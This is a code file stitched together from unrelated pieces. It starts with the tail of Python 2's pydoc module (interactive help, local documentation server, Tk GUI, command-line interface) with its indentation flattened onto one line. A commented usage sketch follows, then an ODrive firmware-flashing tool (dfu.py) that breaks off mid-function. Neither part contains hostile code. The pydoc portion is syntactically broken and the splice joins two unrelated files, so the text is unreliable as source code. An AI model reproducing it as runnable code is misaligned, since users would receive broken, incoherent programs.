('exceptions', 'try except finally raise'), 'COERCIONS': ('coercion-rules','CONVERSIONS'), 'CONVERSIONS': ('conversions', 'COERCIONS'), 'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'), 'SPECIALIDENTIFIERS': ('id-classes', ''), 'PRIVATENAMES': ('atom-identifiers', ''), 'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS ' 'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'), 'TUPLES': 'SEQUENCES', 'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'), 'LISTS': ('typesseq-mutable', 'LISTLITERALS'), 'LISTLITERALS': ('lists', 'LISTS LITERALS'), 'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'), 'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'), 'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'), 'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr ' 'ATTRIBUTEMETHODS'), 'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'), 'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'), 'CALLS': ('calls', 'EXPRESSIONS'), 'POWER': ('power', 'EXPRESSIONS'), 'UNARY': ('unary', 'EXPRESSIONS'), 'BINARY': ('binary', 'EXPRESSIONS'), 'SHIFTING': ('shifting', 'EXPRESSIONS'), 'BITWISE': ('bitwise', 'EXPRESSIONS'), 'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'), 'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'), 'ASSERTION': 'assert', 'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'), 'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'), 'DELETION': 'del', 'PRINTING': 'print', 'RETURNING': 'return', 'IMPORTING': 'import', 'CONDITIONAL': 'if', 'LOOPING': ('compound', 'for while break continue'), 'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'), 'DEBUGGING': ('debugger', 'pdb'), 'CONTEXTMANAGERS': ('context-managers', 'with'), } def __init__(self, input=None, output=None): self._input = input self._output = output input = property(lambda self: self._input or sys.stdin) output = property(lambda self: self._output or sys.stdout) def __repr__(self): if inspect.stack()[1][3] == '?': self() return '' return '<pydoc.Helper instance>' _GoInteractive = object() def __call__(self, request=_GoInteractive): if request is not self._GoInteractive: self.help(request) else: self.intro() self.interact() self.output.write(''' You are now leaving help and returning to the Python interpreter. If you want to ask for help on a particular object directly from the interpreter, you can type "help(object)". Executing "help('string')" has the same effect as typing a particular string at the help> prompt. 
''') def interact(self): self.output.write('\n') while True: try: request = self.getline('help> ') if not request: break except (KeyboardInterrupt, EOFError): break request = strip(replace(request, '"', '', "'", '')) if lower(request) in ('q', 'quit'): break self.help(request) def getline(self, prompt): """Read one line, using raw_input when available.""" if self.input is sys.stdin: return raw_input(prompt) else: self.output.write(prompt) self.output.flush() return self.input.readline() def help(self, request): if type(request) is type(''): request = request.strip() if request == 'help': self.intro() elif request == 'keywords': self.listkeywords() elif request == 'symbols': self.listsymbols() elif request == 'topics': self.listtopics() elif request == 'modules': self.listmodules() elif request[:8] == 'modules ': self.listmodules(split(request)[1]) elif request in self.symbols: self.showsymbol(request) elif request in self.keywords: self.showtopic(request) elif request in self.topics: self.showtopic(request) elif request: doc(request, 'Help on %s:') elif isinstance(request, Helper): self() else: doc(request, 'Help on %s:') self.output.write('\n') def intro(self): self.output.write(''' Welcome to Python %s! This is the online help utility. If this is your first time using Python, you should definitely check out the tutorial on the Internet at http://docs.python.org/%s/tutorial/. Enter the name of any module, keyword, or topic to get help on writing Python programs and using Python modules. To quit this help utility and return to the interpreter, just type "quit". To get a list of available modules, keywords, or topics, type "modules", "keywords", or "topics". Each module also comes with a one-line summary of what it does; to list the modules whose summaries contain a given word such as "spam", type "modules spam". ''' % tuple([sys.version[:3]]*2)) def list(self, items, columns=4, width=80): items = items[:] items.sort() colw = width / columns rows = (len(items) + columns - 1) / columns for row in range(rows): for col in range(columns): i = col * rows + row if i < len(items): self.output.write(items[i]) if col < columns - 1: self.output.write(' ' + ' ' * (colw-1 - len(items[i]))) self.output.write('\n') def listkeywords(self): self.output.write(''' Here is a list of the Python keywords. Enter any keyword to get more help. ''') self.list(self.keywords.keys()) def listsymbols(self): self.output.write(''' Here is a list of the punctuation symbols which Python assigns special meaning to. Enter any symbol to get more help. ''') self.list(self.symbols.keys()) def listtopics(self): self.output.write(''' Here is a list of available topics. Enter any topic name to get more help. ''') self.list(self.topics.keys()) def showtopic(self, topic, more_xrefs=''): try: import pydoc_data.topics except ImportError: self.output.write(''' Sorry, topic and keyword documentation is not available because the module "pydoc_data.topics" could not be found. 
''') return target = self.topics.get(topic, self.keywords.get(topic)) if not target: self.output.write('no documentation found for %s\n' % repr(topic)) return if type(target) is type(''): return self.showtopic(target, more_xrefs) label, xrefs = target try: doc = pydoc_data.topics.topics[label] except KeyError: self.output.write('no documentation found for %s\n' % repr(topic)) return pager(strip(doc) + '\n') if more_xrefs: xrefs = (xrefs or '') + ' ' + more_xrefs if xrefs: import StringIO, formatter buffer = StringIO.StringIO() formatter.DumbWriter(buffer).send_flowing_data( 'Related help topics: ' + join(split(xrefs), ', ') + '\n') self.output.write('\n%s\n' % buffer.getvalue()) def showsymbol(self, symbol): target = self.symbols[symbol] topic, _, xrefs = target.partition(' ') self.showtopic(topic, xrefs) def listmodules(self, key=''): if key: self.output.write(''' Here is a list of matching modules. Enter any module name to get more help. ''') apropos(key) else: self.output.write(''' Please wait a moment while I gather a list of all available modules... ''') modules = {} def callback(path, modname, desc, modules=modules): if modname and modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' if find(modname, '.') < 0: modules[modname] = 1 def onerror(modname): callback(None, modname, None) ModuleScanner().run(callback, onerror=onerror) self.list(modules.keys()) self.output.write(''' Enter any module name to get more help. Or, type "modules spam" to search for modules whose descriptions contain the word "spam". ''') help = Helper() class Scanner: """A generic tree iterator.""" def __init__(self, roots, children, descendp): self.roots = roots[:] self.state = [] self.children = children self.descendp = descendp def next(self): if not self.state: if not self.roots: return None root = self.roots.pop(0) self.state = [(root, self.children(root))] node, children = self.state[-1] if not children: self.state.pop() return self.next() child = children.pop(0) if self.descendp(child): self.state.append((child, self.children(child))) return child class ModuleScanner: """An interruptible scanner that searches module synopses.""" def run(self, callback, key=None, completer=None, onerror=None): if key: key = lower(key) self.quit = False seen = {} for modname in sys.builtin_module_names: if modname != '__main__': seen[modname] = 1 if key is None: callback(None, modname, '') else: desc = split(__import__(modname).__doc__ or '', '\n')[0] if find(lower(modname + ' - ' + desc), key) >= 0: callback(None, modname, desc) for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror): if self.quit: break if key is None: callback(None, modname, '') else: loader = importer.find_module(modname) if hasattr(loader,'get_source'): import StringIO desc = source_synopsis( StringIO.StringIO(loader.get_source(modname)) ) or '' if hasattr(loader,'get_filename'): path = loader.get_filename(modname) else: path = None else: module = loader.load_module(modname) desc = module.__doc__.splitlines()[0] if module.__doc__ else '' path = getattr(module,'__file__',None) if find(lower(modname + ' - ' + desc), key) >= 0: callback(path, modname, desc) if completer: completer() def apropos(key): """Print all the one-line module summaries that contain a substring.""" def callback(path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' print modname, desc and '- ' + desc def onerror(modname): pass with warnings.catch_warnings(): warnings.filterwarnings('ignore') # ignore problems during 
import ModuleScanner().run(callback, key, onerror=onerror) # --------------------------------------------------- web browser interface def serve(port, callback=None, completer=None): import BaseHTTPServer, mimetools, select # Patch up mimetools.Message so it doesn't break if rfc822 is reloaded. class Message(mimetools.Message): def __init__(self, fp, seekable=1): Message = self.__class__ Message.__bases__[0].__bases__[0].__init__(self, fp, seekable) self.encodingheader = self.getheader('content-transfer-encoding') self.typeheader = self.getheader('content-type') self.parsetype() self.parseplist() class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler): def send_document(self, title, contents): try: self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write(html.page(title, contents)) except IOError: pass def do_GET(self): path = self.path if path[-5:] == '.html': path = path[:-5] if path[:1] == '/': path = path[1:] if path and path != '.': try: obj = locate(path, forceload=1) except ErrorDuringImport, value: self.send_document(path, html.escape(str(value))) return if obj: self.send_document(describe(obj), html.document(obj, path)) else: self.send_document(path, 'no Python documentation found for %s' % repr(path)) else: heading = html.heading( '<big><big><strong>Python: Index of Modules</strong></big></big>', '#ffffff', '#7799ee') def bltinlink(name): return '<a href="%s.html">%s</a>' % (name, name) names = filter(lambda x: x != '__main__', sys.builtin_module_names) contents = html.multicolumn(names, bltinlink) indices = ['<p>' + html.bigsection( 'Built-in Modules', '#ffffff', '#ee77aa', contents)] seen = {} for dir in sys.path: indices.append(html.index(dir, seen)) contents = heading + join(indices) + '''<p align=right> <font color="#909090" face="helvetica, arial"><strong> pydoc</strong> by Ka-Ping Yee &lt;ping@lfw.org&gt;</font>''' self.send_document('Index of Modules', contents) def log_message(self, *args): pass class DocServer(BaseHTTPServer.HTTPServer): def __init__(self, port, callback): host = 'localhost' self.address = (host, port) self.callback = callback self.base.__init__(self, self.address, self.handler) def serve_until_quit(self): import select self.quit = False while not self.quit: rd, wr, ex = select.select([self.socket.fileno()], [], [], 1) if rd: self.handle_request() def server_activate(self): self.base.server_activate(self) self.url = 'http://%s:%d/' % (self.address[0], self.server_port) if self.callback: self.callback(self) DocServer.base = BaseHTTPServer.HTTPServer DocServer.handler = DocHandler DocHandler.MessageClass = Message try: try: DocServer(port, callback).serve_until_quit() except (KeyboardInterrupt, select.error): pass finally: if completer: completer() # ----------------------------------------------------- graphical interface def gui(): """Graphical interface (starts web server and pops up a control window).""" class GUI: def __init__(self, window, port=7464): self.window = window self.server = None self.scanner = None import Tkinter self.server_frm = Tkinter.Frame(window) self.title_lbl = Tkinter.Label(self.server_frm, text='Starting server...\n ') self.open_btn = Tkinter.Button(self.server_frm, text='open browser', command=self.open, state='disabled') self.quit_btn = Tkinter.Button(self.server_frm, text='quit serving', command=self.quit, state='disabled') self.search_frm = Tkinter.Frame(window) self.search_lbl = Tkinter.Label(self.search_frm, text='Search for') self.search_ent = 
Tkinter.Entry(self.search_frm) self.search_ent.bind('<Return>', self.search) self.stop_btn = Tkinter.Button(self.search_frm, text='stop', pady=0, command=self.stop, state='disabled') if sys.platform == 'win32': # Trying to hide and show this button crashes under Windows. self.stop_btn.pack(side='right') self.window.title('pydoc') self.window.protocol('WM_DELETE_WINDOW', self.quit) self.title_lbl.pack(side='top', fill='x') self.open_btn.pack(side='left', fill='x', expand=1) self.quit_btn.pack(side='right', fill='x', expand=1) self.server_frm.pack(side='top', fill='x') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) self.search_frm.pack(side='top', fill='x') self.search_ent.focus_set() font = ('helvetica', sys.platform == 'win32' and 8 or 10) self.result_lst = Tkinter.Listbox(window, font=font, height=6) self.result_lst.bind('<Button-1>', self.select) self.result_lst.bind('<Double-Button-1>', self.goto) self.result_scr = Tkinter.Scrollbar(window, orient='vertical', command=self.result_lst.yview) self.result_lst.config(yscrollcommand=self.result_scr.set) self.result_frm = Tkinter.Frame(window) self.goto_btn = Tkinter.Button(self.result_frm, text='go to selected', command=self.goto) self.hide_btn = Tkinter.Button(self.result_frm, text='hide results', command=self.hide) self.goto_btn.pack(side='left', fill='x', expand=1) self.hide_btn.pack(side='right', fill='x', expand=1) self.window.update() self.minwidth = self.window.winfo_width() self.minheight = self.window.winfo_height() self.bigminheight = (self.server_frm.winfo_reqheight() + self.search_frm.winfo_reqheight() + self.result_lst.winfo_reqheight() + self.result_frm.winfo_reqheight()) self.bigwidth, self.bigheight = self.minwidth, self.bigminheight self.expanded = 0 self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.window.tk.willdispatch() import threading threading.Thread( target=serve, args=(port, self.ready, self.quit)).start() def ready(self, server): self.server = server self.title_lbl.config( text='Python documentation server at\n' + server.url) self.open_btn.config(state='normal') self.quit_btn.config(state='normal') def open(self, event=None, url=None): url = url or self.server.url try: import webbrowser webbrowser.open(url) except ImportError: # pre-webbrowser.py compatibility if sys.platform == 'win32': os.system('start "%s"' % url) else: rc = os.system('netscape -remote "openURL(%s)" &' % url) if rc: os.system('netscape "%s" &' % url) def quit(self, event=None): if self.server: self.server.quit = 1 self.window.quit() def search(self, event=None): key = self.search_ent.get() self.stop_btn.pack(side='right') self.stop_btn.config(state='normal') self.search_lbl.config(text='Searching for "%s"...' 
% key) self.search_ent.forget() self.search_lbl.pack(side='left') self.result_lst.delete(0, 'end') self.goto_btn.config(state='disabled') self.expand() import threading if self.scanner: self.scanner.quit = 1 self.scanner = ModuleScanner() def onerror(modname): pass threading.Thread(target=self.scanner.run, args=(self.update, key, self.done), kwargs=dict(onerror=onerror)).start() def update(self, path, modname, desc): if modname[-9:] == '.__init__': modname = modname[:-9] + ' (package)' self.result_lst.insert('end', modname + ' - ' + (desc or '(no description)')) def stop(self, event=None): if self.scanner: self.scanner.quit = 1 self.scanner = None def done(self): self.scanner = None self.search_lbl.config(text='Search for') self.search_lbl.pack(side='left') self.search_ent.pack(side='right', fill='x', expand=1) if sys.platform != 'win32': self.stop_btn.forget() self.stop_btn.config(state='disabled') def select(self, event=None): self.goto_btn.config(state='normal') def goto(self, event=None): selection = self.result_lst.curselection() if selection: modname = split(self.result_lst.get(selection[0]))[0] self.open(url=self.server.url + modname + '.html') def collapse(self): if not self.expanded: return self.result_frm.forget() self.result_scr.forget() self.result_lst.forget() self.bigwidth = self.window.winfo_width() self.bigheight = self.window.winfo_height() self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight)) self.window.wm_minsize(self.minwidth, self.minheight) self.expanded = 0 def expand(self): if self.expanded: return self.result_frm.pack(side='bottom', fill='x') self.result_scr.pack(side='right', fill='y') self.result_lst.pack(side='top', fill='both', expand=1) self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight)) self.window.wm_minsize(self.minwidth, self.bigminheight) self.expanded = 1 def hide(self, event=None): self.stop() self.collapse() import Tkinter try: root = Tkinter.Tk() # Tk will crash if pythonw.exe has an XP .manifest # file and the root has is not destroyed explicitly. # If the problem is ever fixed in Tk, the explicit # destroy can go. 
try: gui = GUI(root) root.mainloop() finally: root.destroy() except KeyboardInterrupt: pass # -------------------------------------------------- command-line interface def ispath(x): return isinstance(x, str) and find(x, os.sep) >= 0 def cli(): """Command-line interface (looks at sys.argv to decide what to do).""" import getopt class BadUsage: pass # Scripts don't get the current directory in their path by default # unless they are run with the '-m' switch if '' not in sys.path: scriptdir = os.path.dirname(sys.argv[0]) if scriptdir in sys.path: sys.path.remove(scriptdir) sys.path.insert(0, '.') try: opts, args = getopt.getopt(sys.argv[1:], 'gk:p:w') writing = 0 for opt, val in opts: if opt == '-g': gui() return if opt == '-k': apropos(val) return if opt == '-p': try: port = int(val) except ValueError: raise BadUsage def ready(server): print 'pydoc server ready at %s' % server.url def stopped(): print 'pydoc server stopped' serve(port, ready, stopped) return if opt == '-w': writing = 1 if not args: raise BadUsage for arg in args: if ispath(arg) and not os.path.exists(arg): print 'file %r does not exist' % arg break try: if ispath(arg) and os.path.isfile(arg): arg = importfile(arg) if writing: if ispath(arg) and os.path.isdir(arg): writedocs(arg) else: writedoc(arg) else: help.help(arg) except ErrorDuringImport, value: print value except (getopt.error, BadUsage): cmd = os.path.basename(sys.argv[0]) print """pydoc - the Python documentation tool %s <name> ... Show text documentation on something. <name> may be the name of a Python keyword, topic, function, module, or package, or a dotted reference to a class or function within a module or module in a package. If <name> contains a '%s', it is used as the path to a Python source file to document. If name is 'keywords', 'topics', or 'modules', a listing of these things is displayed. %s -k <keyword> Search for a keyword in the synopsis lines of all available modules. %s -p <port> Start an HTTP server on the given port on the local machine. Port number 0 can be used to get an arbitrary unused port. %s -g Pop up a graphical interface for finding and serving documentation. %s -w <name> ... Write out the HTML documentation for a module to a file in the current directory. If <name> contains a '%s', it is treated as a filename; if it names a directory, documentation is written for all the contents. """ % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep) if __name__ == '__main__': cli()
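# ---------------------------------------------------------------------------
# Hypothetical usage sketch (not part of the original module): the formatters
# defined above (TextDoc/HTMLDoc, render_doc, resolve, describe, pager) can be
# driven directly without going through cli() or the interactive help() loop.
# Assumes the module above is importable under its stdlib name `pydoc` and a
# Python 2 interpreter; the file name 'json.tool.html' below is illustrative.
import pydoc

# Plain-text documentation, rendered the same way interactive help() shows it.
text_doc = pydoc.render_doc(pydoc.TextDoc, title='Docs for %s')
pydoc.pager(text_doc)  # pages through the text, falling back to plain output

# HTML documentation: resolve a dotted path (importing it if needed), then
# format a complete page, mirroring what writedoc() does internally.
obj, name = pydoc.resolve('json.tool')
page = pydoc.html.page(pydoc.describe(obj), pydoc.html.document(obj, name))
open(name + '.html', 'w').write(page)
# ---------------------------------------------------------------------------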
dfu.py
#!/usr/bin/env python
"""
Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode.
"""

import argparse
import sys
import time
import threading
import platform
import struct
import requests
import re
import io
import os
import usb.core
import fibre
import odrive
from odrive.utils import Event, OperationAbortedException
from odrive.dfuse import *

try:
    from intelhex import IntelHex
except:
    sudo_prefix = "" if platform.system() == "Windows" else "sudo "
    print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix),
          file=sys.stderr)
    sys.exit(1)


def get_fw_version_string(fw_version):
    if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0):
        return "[unknown version]"
    else:
        return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2],
                                    "-dev" if fw_version[3] else "")

def get_hw_version_string(hw_version):
    if hw_version == (0, 0, 0):
        return "[unknown version]"
    else:
        return "v{}.{}{}".format(hw_version[0], hw_version[1],
                                 ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "")

def populate_sectors(sectors, hexfile):
    """
    Checks for which on-device sectors there is data in the hex file and
    returns a (sector, data) tuple for each touched sector where data is a
    byte array of the same size as the sector.
    """
    for sector in sectors:
        addr = sector['addr']
        size = sector['len']
        # check if any segment from the hexfile overlaps with this sector
        touched = False
        for (start, end) in hexfile.segments():
            if start < addr and end > addr:
                touched = True
                break
            elif start >= addr and start < addr + size:
                touched = True
                break
        if touched:
            # TODO: verify if the section is writable
            yield (sector, hexfile.tobinarray(addr, addr + size - 1))

def get_first_mismatch_index(array1, array2):
    """
    Compares two arrays and returns the index of the first unequal item
    or None if both arrays are equal
    """
    if len(array1) != len(array2):
        raise Exception("arrays must be same size")
    for pos in range(len(array1)):
        if (array1[pos] != array2[pos]):
            return pos
    return None

def dump_otp(dfudev):
    """
    Dumps the contents of the one-time-programmable memory for debugging
    purposes. The OTP is used to determine the board version.
    """
    # 512 Byte OTP
    otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
    data = dfudev.read_sector(otp_sector)
    print(' '.join('{:02X}'.format(x) for x in data))

    # 16 lock bytes
    otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0]
    data = dfudev.read_sector(otp_lock_sector)
    print(' '.join('{:02X}'.format(x) for x in data))


class Firmware():
    def __init__(self):
        self.fw_version = (0, 0, 0, True)
        self.hw_version = (0, 0, 0)

    @staticmethod
    def is_newer(a, b):
        a_num = (a[0], a[1], a[2])
        b_num = (b[0], b[1], b[2])
        if a_num == (0, 0, 0) or b_num == (0, 0, 0):
            return False  # Cannot compare unknown versions
        return a_num > b_num or (a_num == b_num and not a[3] and b[3])

    def __gt__(self, other):
        """
        Compares two firmware versions. If both versions are equal, the
        prerelease version is considered older than the release version.
        """
        if not isinstance(other, tuple):
            other = other.fw_version
        return Firmware.is_newer(self.fw_version, other)

    def __lt__(self, other):
        """
        Compares two firmware versions. If both versions are equal, the
        prerelease version is considered older than the release version.
        """
        if not isinstance(other, tuple):
            other = other.fw_version
        return Firmware.is_newer(other, self.fw_version)

    def is_compatible(self, hw_version):
        """
        Determines if this firmware is compatible with the specified hardware version
        """
        return self.hw_version == hw_version

class FirmwareFromGithub(Firmware):
    """
    Represents a firmware asset
    """
    def __init__(self, release_json, asset_json):
        Firmware.__init__(self)
        if release_json['draft'] or release_json['prerelease']:
            release_json['tag_name'] += "*"
        self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name'])
        hw_version_regex = r'.*v([0-9]+).([0-9]+)(-(?P<voltage>[0-9]+)V)?.hex'
        hw_version_match = re.search(hw_version_regex, asset_json['name'])
        self.hw_version = (int(hw_version_match[1]),
                           int(hw_version_match[2]),
                           int(hw_version_match.groupdict().get('voltage') or 0))
        self.github_asset_id = asset_json['id']
        self.hex = None
        # no technical reason to fetch this - just interesting
        self.download_count = asset_json['download_count']

    def get_as_hex(self):
        """
        Returns the content of the firmware in as a binary array in
        Intel Hex format
        """
        if self.hex is None:
            print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version)))
            response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id),
                                    headers={'Accept': 'application/octet-stream'})
            if response.status_code != 200:
                raise Exception("failed to download firmware")
            self.hex = response.content
        return io.StringIO(self.hex.decode('utf-8'))

class FirmwareFromFile(Firmware):
    def __init__(self, file):
        Firmware.__init__(self)
        self._file = file

    def get_as_hex(self):
        return self._file


def get_all_github_firmwares():
    response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases')
    if response.status_code != 200:
        raise Exception("could not fetch releases")
    response_json = response.json()
    for release_json in response_json:
        for asset_json in release_json['assets']:
            try:
                if asset_json['name'].lower().endswith('.hex'):
                    fw = FirmwareFromGithub(release_json, asset_json)
                    yield fw
            except Exception as ex:
                print(ex)

def get_newest_firmware(hw_version):
    """
    Returns the newest available firmware for the specified hardware version
    """
    firmwares = get_all_github_firmwares()
    firmwares = filter(lambda fw: not fw.fw_version[3], firmwares)  # ignore prereleases
    firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares)
    firmwares = list(firmwares)
    firmwares.sort()
    return firmwares[-1] if len(firmwares) else None

def show_deferred_message(message, cancellation_token):
    """
    Shows a message after 10s, unless cancellation_token gets set.
    """
    def show_message_thread(message, cancellation_token):
        for _ in range(1, 10):
            if cancellation_token.is_set():
                return
            time.sleep(1)
        if not cancellation_token.is_set():
            print(message)
    t = threading.Thread(target=show_message_thread, args=(message, cancellation_token))
    t.daemon = True
    t.start()

def put_into_dfu_mode(device, cancellation_token):
    """
    Puts the specified device into DFU mode
    """
    if not hasattr(device, "enter_dfu_mode"):
        print("The firmware on device {} does not support DFU. You need to \n"
              "flash the firmware once using STLink (`make flash`), after that \n"
              "DFU with this script should work fine."
              .format(device.__channel__.usb_device.serial_number))
        return
    print("Putting device {} into DFU mode...".format(device.__channel__.usb_device.serial_number))
    try:
        device.enter_dfu_mode()
    except fibre.ChannelBrokenException:
        pass  # this is expected because the device reboots
    if platform.system() == "Windows":
        show_deferred_message("Still waiting for the device to reappear.\n"
                              "Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.",
                              cancellation_token)

def find_device_in_dfu_mode(serial_number, cancellation_token):
    """
    Polls libusb until a device in DFU mode is found
    """
    while not cancellation_token.is_set():
        params = {} if serial_number == None else {'serial_number': serial_number}
        stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params)
        if stm_device != None:
            return stm_device
        time.sleep(1)
    return None

def update_device(device, firmware, logger, cancellation_token):
    """
    Updates the specified device with the specified firmware.
    The device passed to this function can either be in normal mode or in DFU mode.
    The firmware should be an instance of Firmware or None. If firmware is None,
    the newest firmware for the device is downloaded from GitHub releases.
    """
    if isinstance(device, usb.core.Device):
        serial_number = device.serial_number
        dfudev = DfuDevice(device)
        if (logger._verbose):
            logger.debug("OTP:")
            dump_otp(dfudev)

        # Read hardware version from one-time-programmable memory
        otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
        otp_data = dfudev.read_sector(otp_sector)
        if otp_data[0] == 0:
            otp_data = otp_data[16:]
        if otp_data[0] == 0xfe:
            hw_version = (otp_data[3], otp_data[4], otp_data[5])
        else:
            hw_version = (0, 0, 0)
    else:
        serial_number = device.__channel__.usb_device.serial_number
        dfudev = None

        # Read hardware version as reported from firmware
        hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0
        hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0
        hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0
        hw_version = (hw_version_major, hw_version_minor, hw_version_variant)

    if hw_version < (3, 5, 0):
        print(" DFU mode is not supported on board version 3.4 or earlier.")
        print(" This is because entering DFU mode on such a device would")
        print(" break the brake resistor FETs under some circumstances.")
        print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.")
        if not odrive.utils.yes_no_prompt("Do you still want to continue?", False):
            raise OperationAbortedException()

    fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0
    fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0
    fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0
    fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True
    fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease)

    print("Found ODrive {} ({}) with firmware {}{}".format(
        serial_number,
        get_hw_version_string(hw_version),
        get_fw_version_string(fw_version),
        " in DFU mode" if dfudev is not None else ""))

    if firmware is None:
        if hw_version == (0, 0, 0):
            if dfudev is None:
                suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.'
            else:
                suggestion = 'Run "make write_otp" to program the board version.'
            raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion)
        print("Checking online for newest firmware...", end='')
        firmware = get_newest_firmware(hw_version)
        if firmware is None:
            raise Exception("could not find any firmware release for this board version")
        print(" found {}".format(get_fw_version_string(firmware.fw_version)))

    if firmware.fw_version <= fw_version:
        print()
        if firmware.fw_version < fw_version:
            print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format(
                get_fw_version_string(firmware.fw_version),
                get_fw_version_string(fw_version)))
        else:
            print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format(
                get_fw_version_string(firmware.fw_version),
                get_fw_version_string(fw_version)))
        if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False):
            raise OperationAbortedException()

    # load hex file
    # TODO: Either use the elf format or pack a custom format with a manifest.
    # This way we can for instance verify the target board version and only
    # have to publish one file for every board (instead of elf AND hex files).
    hexfile = IntelHex(firmware.get_as_hex())

    logger.debug("Contiguous segments in hex file:")
    for start, end in hexfile.segments():
        logger.debug(" {:08X} to {:08X}".format(start, end - 1))

    # Back up configuration
    if dfudev is None:
        did_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False
        if did_backup_config:
            odrive.configuration.backup_config(device, None, logger)
    elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True):
        raise OperationAbortedException()

    # Put the device into DFU mode if it's not already in DFU mode
    if dfudev is None:
        find_odrive_cancellation_token = Event(cancellation_token)
        put_into_dfu_mode(device, find_odrive_cancellation_token)
        stm_device = find_device_in_dfu_mode(serial_number, cancellation_token)
        find_odrive_cancellation_token.set()
        dfudev = DfuDevice(stm_device)

    logger.debug("Sectors on device: ")
    for sector in dfudev.sectors:
        logger.debug(" {:08X} to {:08X} ({})".format(
            sector['addr'], sector['addr'] + sector['len'] - 1, sector['name']))

    # fill sectors with data
    touched_sectors = list(populate_sectors(dfudev.sectors, hexfile))

    logger.debug("The following sectors will be flashed: ")
    for sector, _ in touched_sectors:
        logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1))

    # Erase
    try:
        for i, (sector, data) in enumerate(touched_sectors):
            print("Erasing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
            dfudev.erase_sector(sector)
        print('Erasing... done \r', end='', flush=True)
    finally:
        print('', flush=True)

    # Flash
    try:
        for i, (sector, data) in enumerate(touched_sectors):
            print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
            dfudev.write_sector(sector, data)
        print('Flashing... done \r', end='', flush=True)
    finally:
        print('', flush=True)

    # Verify
    try:
        for i, (sector, expected_data) in enumerate(touched_sectors):
            print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
            observed_data = dfudev.read_sector(sector)
            mismatch_pos = get_first_mismatch_index(observed_data, expected_data)
            if not mismatch_pos is None:
                mismatch_pos -= mismatch_pos % 16
                observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16])
                expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16])
                raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) +
                                   " expected: " + expected_snippet + "\n"
                                   " observed: " + observed_snippet)
        print('Verifying... done \r', end='', flush=True)
    finally:
        print('', flush=True)

    # If the flash operation failed for some reason, your device is bricked now.
    # You can unbrick it as long as the device remains powered on.
    # (or always with an STLink)
    # So for debugging you should comment this last part out.

    # Jump to application
    dfudev.jump_to_application(0x08000000)

    logger.info("Waiting for the device to reappear...")
    device = odrive.find_any("usb", serial_number, cancellation_token, cancellation_token, timeout=30)

    if did_backup_config:
